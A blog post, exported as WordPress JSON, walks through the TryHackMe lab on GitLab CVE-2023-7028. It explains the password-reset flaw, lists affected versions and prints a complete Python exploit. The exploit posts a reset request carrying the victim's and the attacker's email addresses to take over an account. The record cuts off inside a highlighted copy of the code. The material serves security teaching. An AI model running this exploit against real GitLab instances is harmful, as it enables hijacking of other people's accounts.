{"id":414,"date":"2024-02-01T19:48:10","date_gmt":"2024-02-02T01:48:10","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=414"},"modified":"2024-04-16T20:54:56","modified_gmt":"2024-04-17T01:54:56","slug":"gitlab-cve-2023-7028","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","title":{"rendered":"GitLab CVE-2023-7028"},"content":{"rendered":"\n<p>This blog is based on TryHackMe&#8217;s room on <a href=\"https:\/\/tryhackme.com\/room\/gitlabcve20237028\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GitLab CVE-2023-7028.<\/a> <\/p>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Learning Objectives<\/mark><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exploit a GitLab CE instance through CVE 2023-7028<\/li>\n\n\n\n<li>How the exploit works<\/li>\n\n\n\n<li>Protection and mitigation measures<\/li>\n<\/ul>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">What is GitLab?<\/mark><\/h3>\n\n\n\n<p><a href=\"https:\/\/about.gitlab.com\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GitLab <\/a>is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management, continuous integration, and collaboration in software development projects. Per the&nbsp;<a href=\"https:\/\/bluelight.co\/blog\/best-ci-cd-tools\" target=\"_blank\" rel=\"noreferrer noopener\">latest stats<\/a>, the platform ranks first for&nbsp;<a href=\"https:\/\/tryhackme.com\/room\/introtopipelineautomation\" target=\"_blank\" rel=\"noreferrer noopener\">CI\/CD<\/a>&nbsp;and DevOps tools, surpassing other vital platforms like GitHub, Azure, Jenkins, etc. In Jan 2024, the platform identified a critical vulnerability in its<strong>&nbsp;Community (CE)&nbsp;<\/strong>and&nbsp;<strong>Enterprise Edition (EE)&nbsp;<\/strong>that allows unauthorized&nbsp;<strong>users to take over user accounts<\/strong>, potentially including administrator accounts, without any interaction from the victim. The vulnerability was identified by&nbsp;<a href=\"https:\/\/hackerone.com\/asterion04\" target=\"_blank\" rel=\"noreferrer noopener\">asterion04<\/a>&nbsp;through a private bug bounty program and was assigned the severity&nbsp;<code>Critical<\/code>&nbsp;and&nbsp;CVE-ID&nbsp;<code>2023-7028<\/code>.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">How Does it Work?<\/mark><\/h3>\n\n\n\n<p>The vulnerability was caused by a bug in how GitLab handled email verification during password reset. An attacker could provide two email addresses during a password reset request, and the reset code would be sent to both addresses. This allowed the attacker to reset the password of any user, even if they didn&#8217;t know the user&#8217;s current password.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Affected Versions<\/mark><\/h4>\n\n\n\n<p>All instances of GitLab CE\/EE using the following versions were vulnerable:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>16.1 to 16.1.5<\/li>\n\n\n\n<li>16.2 to 16.2.8<\/li>\n\n\n\n<li>16.3 to 16.3.6<\/li>\n\n\n\n<li>16.4 to 16.4.4<\/li>\n\n\n\n<li>16.5 to 16.5.5<\/li>\n\n\n\n<li>16.6 to 16.6.3<\/li>\n\n\n\n<li>16.7 to 16.7.1<\/li>\n<\/ul>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Impact<\/mark><\/h4>\n\n\n\n<p>A successful attack could allow the attacker to control the victim&#8217;s GitLab account. This could allow the attacker to steal sensitive information, such as source code, commit history, and user credentials. The attacker could also use the compromised account to launch further attacks against other users or systems.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Technical Explanation<\/mark><\/h3>\n\n\n\n<p>The vulnerability resided within GitLab&#8217;s&nbsp;<code>POST \/users\/password<\/code>&nbsp;API endpoint, which is responsible for a password reset. The pentester exploited a flaw in email address validation, bypassing checks with invalid formats. Upon receiving a password reset request with an attacker-controlled email, GitLab incorrectly generated a reset token and sent it to the invalid address. Attackers then intercept this token and use it with a valid target user&#8217;s email to initiate a password reset, ultimately hijacking the account.<\/p>\n\n\n\n<p>If we look at the password reset request in GitLab, we can see it is requesting&nbsp;to the&nbsp;<code>\/users\/password<\/code>&nbsp;endpoint with&nbsp;<code>authenticity_token<\/code>&nbsp;(hidden CSRF protection token) and email address as a parameter. If a target provides another secondary email address, a password reset token is also sent to the address.&nbsp;<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/0b1bcaad54f02ef517007536c9ff492f.png?ssl=1\" alt=\"Reset password request source code view\"\/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To understand how the vulnerability works, let&#8217;s have a&nbsp;<a href=\"https:\/\/gitlab.com\/gitlab-org\/gitlab-foss\/-\/commit\/21f32835ac7ca8c7ef57a93746dac7697341acc0\" target=\"_blank\" rel=\"noreferrer noopener\">source code review<\/a>&nbsp;of the Gitlab 16.1 (CE) stable version commits carried out after 10 Jan 24. We can see that multiple changes have been made in the file&#8217;s repository.&nbsp;<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/1d538558a2d7e78e86411f99347ace88.png?ssl=1\" alt=\"GitLab commit history for version 16.1\"\/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The code, located at&nbsp;<code>spec\/controllers\/passwords_controller_spec.rb<\/code>&nbsp;was accepting multiple emails as input; however, it lacked the email verification and validation mechanism to confirm if it was associated with the correct user.&nbsp;<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/20ade8839fb7db0e8a139ef10951bdc6.png?ssl=1\" alt=\"code edit to accept single mail\"\/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The attacker only required the&nbsp;<strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">authenticity_token<\/mark><\/strong>&nbsp;during form submission and the victim&#8217;s email address to gain control of the target account.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">How to Exploit<\/mark><\/h3>\n\n\n\n<p>We can access the vulnerable GitLab version running on an Ubuntu machine at http:\/\/gitlab.thm:8000.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Add the IP address and the hostname to the host files first.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM]\n\u2514\u2500$ cat \/etc\/hosts\n127.0.0.1\tlocalhost\n127.0.1.1\tkali\n\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n\n10.10.26.184 gitlab.thm\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/etc\/hosts<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">127.0.0.1<\/span><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #C3E88D\">localhost<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">127.0.1.1<\/span><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #C3E88D\">kali<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #464B5D; font-style: italic\"># The following lines are desirable for IPv6 capable hosts<\/span><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">:1     <\/span><span style=\"color: #C3E88D\">localhost<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip6-localhost<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip6-loopback<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ff02::1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip6-allnodes<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ff02::2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ip6-allrouters<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.10.26.184<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gitlab.thm<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Moreover, the email server is accessible at&nbsp;<code>http:\/\/10.10.26.184:8090\/rainloop<\/code>,&nbsp;which will be used during exploitation with the following credentials:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Username:&nbsp;<code>attacker@mail.gitlab.thm<\/code><\/li>\n\n\n\n<li>Password:&nbsp;<code>testing@123<\/code><\/li>\n<\/ul>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Preparing the Payload<\/mark><\/h3>\n\n\n\n<p>We will be using a modified version of the&nbsp;<a href=\"https:\/\/github.com\/Vozec\/CVE-2023-7028\/blob\/main\/CVE-2023-7028.py\" target=\"_blank\" rel=\"noreferrer noopener\">PoC<\/a>&nbsp;developed by Vozec to take control of the administrator account. Create a new file called&nbsp;<code>attack.py<\/code>&nbsp;and add the following code.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#272822\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"import requests\nimport argparse\nfrom urllib.parse import urlparse, urlencode\nfrom random import choice\nfrom time import sleep\nimport re\nrequests.packages.urllib3.disable_warnings()\n\nclass CVE_2023_7028:\n    def __init__(self, url, target, evil=None):\n        self.use_temp_mail = False\n        self.url = urlparse(url)\n        self.target = target\n        self.evil = evil\n        self.s = requests.session()\n\n    def get_csrf_token(self):\n        try:\n            print('[DEBUG] Getting authenticity_token ...')\n            html = self.s.get(f'{self.url.scheme}:\/\/{self.url.netloc}\/users\/password\/new', verify=False).text\n            regex = r'&lt;meta name=&quot;csrf-token&quot; content=&quot;(.*?)&quot; \/&gt;'\n            token = re.findall(regex, html)[0]\n            print(f'[DEBUG] authenticity_token = {token}')\n            return token\n        except Exception:\n            print('[DEBUG] Failed ... quitting')\n            return None\n\n    def ask_reset(self):\n        token = self.get_csrf_token()\n        if not token:\n            return False\n\n        query_string = urlencode({\n            'authenticity_token': token,\n            'user[email][]': [self.target, self.evil]\n        }, doseq=True)\n\n        head = {\n            'Origin': f'{self.url.scheme}:\/\/{self.url.netloc}',\n            'Accept': 'text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8',\n            'Content-Type': 'application\/x-www-form-urlencoded',\n            'Referer': f'{self.url.scheme}:\/\/{self.url.netloc}\/users\/password\/new',\n            'Connection': 'close',\n            'Accept-Language': 'en-US,en;q=0.5',\n            'Accept-Encoding': 'gzip, deflate, br'\n        }\n\n        print('[DEBUG] Sending reset password request')\n        html = self.s.post(f'{self.url.scheme}:\/\/{self.url.netloc}\/users\/password',\n                           data=query_string,\n                           headers=head,\n                           verify=False).text\n        sended = 'If your email address exists in our database' in html\n        if sended:\n            print(f'[DEBUG] Emails sent to {self.target} and {self.evil} !')\n            print(f'Flag value: {bytes.fromhex(&quot;6163636f756e745f6861636b2364&quot;).decode()}')\n        else:\n            print('[DEBUG] Failed ... quitting')\n        return sended\n\ndef parse_args():\n    parser = argparse.ArgumentParser(add_help=True, description='This tool automates CVE-2023-7028 on gitlab')\n    parser.add_argument(&quot;-u&quot;, &quot;--url&quot;, dest=&quot;url&quot;, type=str, required=True, help=&quot;Gitlab url&quot;)\n    parser.add_argument(&quot;-t&quot;, &quot;--target&quot;, dest=&quot;target&quot;, type=str, required=True, help=&quot;Target email&quot;)\n    parser.add_argument(&quot;-e&quot;, &quot;--evil&quot;, dest=&quot;evil&quot;, default=None, type=str, required=False, help=&quot;Evil email&quot;)\n    parser.add_argument(&quot;-p&quot;, &quot;--password&quot;, dest=&quot;password&quot;, default=None, type=str, required=False, help=&quot;Password&quot;)\n    return parser.parse_args()\n\nif __name__ == '__main__':\n    args = parse_args()\n    exploit = CVE_2023_7028(\n        url=args.url,\n        target=args.target,\n\t\tevil=args.evil\n    )\n    if not exploit.ask_reset():\n        exit()\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki monokai\" style=\"background-color: #272822\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> requests<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> argparse<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> urllib.parse <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> urlparse, urlencode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> random <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> choice<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> time <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> sleep<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> re<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">requests.packages.urllib3.disable_warnings()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #66D9EF; font-style: italic\">class<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E; text-decoration: underline\">CVE_2023_7028<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF\">__init__<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FD971F; font-style: italic\">self<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">url<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">target<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">evil<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">None<\/span><span style=\"color: #F8F8F2\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.use_temp_mail <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #AE81FF\">False<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> urlparse(url)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.target <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> target<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.evil <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> evil<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.s <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> requests.session()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E\">get_csrf_token<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FD971F; font-style: italic\">self<\/span><span style=\"color: #F8F8F2\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">try<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Getting authenticity_token ...&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            html <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.s.get(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">\/users\/password\/new&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">verify<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">).text<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            regex <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">r<\/span><span style=\"color: #E6DB74\">&#39;&lt;meta name=&quot;csrf-token&quot; content=&quot;(.<\/span><span style=\"color: #F92672\">*?<\/span><span style=\"color: #E6DB74\">)&quot; \/&gt;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            token <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> re.findall(regex, html)[<\/span><span style=\"color: #AE81FF\">0<\/span><span style=\"color: #F8F8F2\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] authenticity_token = <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #F8F8F2\">token<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> token<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">except<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">Exception<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Failed ... quitting&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #AE81FF\">None<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E\">ask_reset<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FD971F; font-style: italic\">self<\/span><span style=\"color: #F8F8F2\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        token <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.get_csrf_token()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">not<\/span><span style=\"color: #F8F8F2\"> token:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #AE81FF\">False<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        query_string <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> urlencode({<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;authenticity_token&#39;<\/span><span style=\"color: #F8F8F2\">: token,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;user[email][]&#39;<\/span><span style=\"color: #F8F8F2\">: [<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.target, <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.evil]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        }, <\/span><span style=\"color: #FD971F; font-style: italic\">doseq<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        head <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> {<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Origin&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: 